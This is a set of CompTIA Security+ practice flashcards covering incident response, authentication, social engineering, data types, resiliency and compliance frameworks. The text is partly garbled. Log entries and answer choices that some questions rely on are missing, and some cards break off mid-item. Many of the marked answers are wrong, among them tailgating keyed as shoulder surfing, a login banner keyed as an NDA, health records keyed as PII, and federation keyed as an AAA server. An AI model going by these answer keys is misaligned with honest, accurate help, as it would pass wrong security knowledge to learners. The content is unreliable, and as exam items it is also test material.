comptia exam 151-200 Flashcards by Avante Davidson

A SOC operator is analyzing a log file that contains the following entries:

Which of the following explains these log entries?

A. SQL injection and improper input-handling attempts
B. Cross-site scripting and resource exhaustion attempts
C. Command injection and directory traversal attempts
D. Error handling and privilege escalation attempts

C. Command injection and directory traversal attempts

How well did you know this?

Not at all

Perfectly

A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?

A. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.
B. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.
C. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.
D. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.

A. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.

How well did you know this?

Not at all

Perfectly

HOTSPOT -
Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS -
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

Botnet->Enable DDoS protection
RAT->Disable remote access services
Worm-> Change default passwords
Keylogger->2FA using push
Backdoor->Code Review

How well did you know this?

Not at all

Perfectly

During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Once the password is created, the company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user’s intranet account? (Choose two.)

A. Federation
B. Identity proofing
C. Password complexity
D. Default password changes
E. Password manager
F. Open authentication

A. Federation
C. Password complexity

How well did you know this?

Not at all

Perfectly

SIMULATION -
An attack has occurred against a company.

INSTRUCTIONS -
You have been tasked to do the following:
✑ Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and reviewing the output.
✑ Identify which compensating controls a developer should implement on the assets, in order to reduce the effectiveness of future attacks by dragging them to the correct server.
All objects will be used, but not all placeholders may be filled. Objects may only be used once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Cross

How well did you know this?

Not at all

Perfectly

SIMULATION -
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802.1X using the most secure encryption and protocol available.

INSTRUCTIONS -
Perform the following steps:
4. Configure the RADIUS server.
5. Configure the WiFi controller.
6. Preconfigure the client for an incoming guest. The guest AD credentials are:

User: guest01 -

Password: guestpass -
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Wifi Controller
SSID: CORPGUEST
SHARED KEY: Secret
AAA server IP: 192.168.1.20
PSK: Blank
Authentication type: WPA2-EAP-PEAP-MSCHAPv2
Controller IP: 192.168.1.10

Radius Server
Shared Key: Secret
Client IP: 192.168.1.10
Authentication Type: Active Directory
Server IP: 192.168.1.20

Wireless Client
SSID: CORPGUEST
Username: guest01
Userpassword: guestpass
PSK: Blank
Authentication type: WPA2-Enterprise

How well did you know this?

Not at all

Perfectly

HOTSPOT -
An incident has occurred in the production environment.

INSTRUCTIONS -
Analyze the command outputs and identify the type of compromise.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

Rootkit

RAT

How well did you know this?

Not at all

Perfectly

on #158Topic 1
After a recent security incident, a security analyst discovered that unnecessary ports were open on a firewall policy for a web server. Which of the following firewall polices would be MOST secure for a web server?
A.

How well did you know this?

Not at all

Perfectly

A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of data loss?

A. Dual supply
B. Generator
C. UPS
D. POU
E. Daily backups

B. Generator

How well did you know this?

Not at all

Perfectly

Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?

A. Shut down the VDI and copy off the event logs.
B. Take a memory snapshot of the running system.
C. Use NetFlow to identify command-and-control IPs.
D. Run a full on-demand scan of the root volume.

C. Use NetFlow to identify command-and-control IPs.

How well did you know this?

Not at all

Perfectly

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of the following is this an example of?

A. AUP
B. NDA
C. SLA
D. MOU

B. NDA

How well did you know this?

Not at all

Perfectly

The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees’ workstations to prevent information from leaving the company’s network?

A. HIPS
B. DLP
C. HIDS
D. EDR

D. EDR

How well did you know this?

Not at all

Perfectly

On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized?

A. Shoulder surfing
B. Watering-hole attack
C. Tailgating
D. Impersonation

A. Shoulder surfing

How well did you know this?

Not at all

Perfectly

Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left unsecured. Which of the following types of data does this combination BEST represent?

A. Personal health information
B. Personally identifiable information
C. Tokenized data
D. Proprietary data

B. Personally identifiable information

How well did you know this?

Not at all

Perfectly

A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was not working. Which of the following is the MOST likely threat actor?

A. Shadow IT
B. Script kiddies
C. APT
D. Insider threat

D. Insider threat

How well did you know this?

Not at all

Perfectly

An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed properly and is a valid wildcard. This same certificate is installed on the other company servers without issue. Which of the following is the MOST likely reason for this finding?

A. The required intermediate certificate is not loaded as part of the certificate chain.
B. The certificate is on the CRL and is no longer valid.
C. The corporate CA has expired on every server, causing the certificate to fail verification.
D. The scanner is incorrectly configured to not trust this certificate when detected on the server.

B. The certificate is on the CRL and is no longer valid.

How well did you know this?

Not at all

Perfectly

A company wants to improve end users’ experiences when they log in to a trusted partner website. The company does not want the users to be issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own credentials to log in to the trusted partner’s website?

A. Directory service
B. AAA server
C. Federation
D. Multifactor authentication

B. AAA server

How well did you know this?

Not at all

Perfectly

A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not deleted. Which of the following should the company implement to assist in the investigation?

A. Legal hold
B. Chain of custody
C. Data loss prevention
D. Content filter

B. Chain of custody

How well did you know this?

Not at all

Perfectly

A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user opened a ticket for this issue but was able to log in successfully. Which of the following BEST describes the policy that is being implemented?
A. Time-based logins
B. Geofencing
C. Network location
D. Password history

B. Geofencing

How well did you know this?

Not at all

Perfectly

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage. Which of the following BEST describes these threat actors?

A. Semi-authorized hackers
B. State actors
C. Script kiddies
D. Advanced persistent threats

B. State actors

How well did you know this?

Not at all

Perfectly

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?
A. Default system configuration
B. Unsecure protocols
C. Lack of vendor support
D. Weak encryption

B. Unsecure protocols

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place?
A. Input validation
B. Dynamic code analysis
C. Fuzzing
D. Manual code review

B. Dynamic code analysis

Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?

A. Smart card
B. Push notifications
C. Attestation service
D. HMAC-based
E. one-time password

B. Push notifications

A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers without migrating servers to a new network. Which of the following solutions should the company implement?
A. Intranet
B. Screened subnet
C. VLAN segmentation
D. Zero Trust

C. VLAN segmentation

The president of a regional bank likes to frequently provide SOC tours to potential investors. Which of the following policies BEST reduces the risk of malicious activity occurring after a tour? A. Password complexity B. Acceptable use C. Access control D. Clean desk

D. Clean desk

A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows: * Critical fileshares will remain accessible during and after a natural disaster. * Five percent of hard disks can fail at any given time without impacting the data. * Systems will be forced to shut down gracefully when battery levels are below 20%. Which of the following are required to BEST meet these objectives? (Choose three.) A. Fiber switching B. IaC C. NAS D. RAID E. UPS F. Redundant power supplies G. Geographic dispersal H. Snapshots I. Load balancing

B. IaC C. NAS D. RAID

Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM? A. Set up hashing on the source log file servers that complies with local regulatory requirements. B. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements. C. Write protect the aggregated log files and move them to an isolated server with limited access. D. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.

A. Set up hashing on the source log file servers that complies with local regulatory requirements.

A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company's cloud environment. Which of the following is an immediate consequence of these integrations? A. Non-compliance with data sovereignty rules B. Loss of the vendors interoperability support C. Mandatory deployment of a SIEM solution D. Increase in the attack surface

A. Non-compliance with data sovereignty rules

Which of the following explains why RTO is included in a BIA? A. It identifies the amount of allowable downtime for an application or system. B. It prioritizes risks so the organization can allocate resources appropriately. C. It monetizes the loss of an asset and determines a break-even point for risk mitigation. D. It informs the backup approach so that the organization can recover data to a known time.

A. It identifies the amount of allowable downtime for an application or system.

A security analyst is reviewing web-application logs and finds the following log: Which of the following attacks is being observed? A. Directory traversal B. XSS C. CSRF D. On-path attack

C. CSRF

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause? A. Security patches were uninstalled due to user impact. B. An adversary altered the vulnerability scan reports C. A zero-day vulnerability was used to exploit the web server D. The scan reported a false negative for the vulnerability

A. Security patches were uninstalled due to user impact.

Which of the following is a known security risk associated with data archives that contain financial information? A. Data can become a liability if archived longer than required by regulatory guidance. B. Data must be archived off-site to avoid breaches and meet business requirements. C. Companies are prohibited from providing archived data to e-discovery requests. D. Unencrypted archives should be preserved as long as possible and encrypted.

A. Data can become a liability if archived longer than required by regulatory guidance.

Which of the following BEST describes the process of documenting who has access to evidence? A. Order of volatility B. Chain of custody C. Non-repudiation D. Admissibility

B. Chain of custody

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.) A. Private cloud B. SaaS C. Hybrid cloud D. IaaS E. DRaaS F. Fog computing

C. Hybrid cloud F. Fog computing

Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization? A. Asset management policy B. Separation of duties policy C. Acceptable use policy D. Job rotation policy

D. Job rotation policy

A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives? A. WAF B. CASB C. VPN D. TLS

D. TLS

A security analyst is tasked with defining the "something you are" factor of the company's MFA settings. Which of the following is BEST to use to complete the configuration? A. Gait analysis B. Vein C. Soft token D. HMAC-based, one-time password

B. Vein

Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete? A. Pulverizing B. Overwriting C. Shredding D. Degaussing

B. Overwriting

A user's account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM: Which of the following describes what is occurring? A. An attacker is utilizing a password-spraying attack against the account. B. An attacker is utilizing a dictionary attack against the account. C. An attacker is utilizing a brute-force attack against the account. D. An attacker is utilizing a rainbow table attack against the account.

C. An attacker is utilizing a brute-force attack against the account.

A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state? A. The last incremental backup that was conducted 72 hours ago B. The last known-good configuration C. The last full backup that was conducted seven days ago D. The baseline OS configuration

A. The last incremental backup that was conducted 72 hours ago

A network engineer created two subnets that will be used for production and development servers. Per security policy production and development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be deployed so that server administrators can access these devices? A. VLANs B. Internet proxy servers C. NIDS D. Jump servers

A. VLANs

A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with international standards. With which of the following is the company's data protection officer MOST likely concerned? A. NIST Framework B. ISO 27001 C. GDPR D. PCI-DSS

A. NIST Framework

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to BEST meet the requirement? A. Fog computing and KVMs B. VDI and thin clients C. Private cloud and DLP D. Full drive encryption and thick clients

B. VDI and thin clients

A Chief Information Security Officer wants to ensure the organization is validating and checking the integrity of zone transfers. Which of the following solutions should be implemented? A. DNSSEC B. LDAPS C. NGFW D. DLP

A. DNSSEC

Which of the following controls is used to make an organization initially aware of a data compromise? A. Protective B. Preventative C. Corrective D. Detective

D. Detective

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations? A. CIS benchmarks B. GDPR guidance C. Regional regulations D. ISO 27001 standards

A. CIS benchmarks

A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements? A. High availability B. Application security C. Segmentation D. Integration and auditing

D. Integration and auditing

After a recent external audit, the compliance team provided a list of several non-compliant, in-scope hosts that were not encrypting cardholder data at rest. Which of the following compliance frameworks would address the compliance team's GREATEST concern? A. PCI DSS B. GDPR C. ISO 27001 D. NIST CSF

A. PCI DSS

A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. The security analyst would like to create a baseline of normal operations and reduce noise. Which of the following actions should the security analyst perform? A. Adjust the data flow from authentication sources to the SIEM. B. Disable email alerting and review the SIEM directly. C. Adjust the sensitivity levels of the SIEM correlation engine. D. Utilize behavioral analysis to enable the SIEM's learning mode.

B. Disable email alerting and review the SIEM directly.

Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is released into production? A. Employ different techniques for server- and client-side validations B. Use a different version control system for third-party libraries C. Implement a vulnerability scan to assess dependencies earlier on SDLC D. Increase the number of penetration tests before software release

D. Increase the number of penetration tests before software release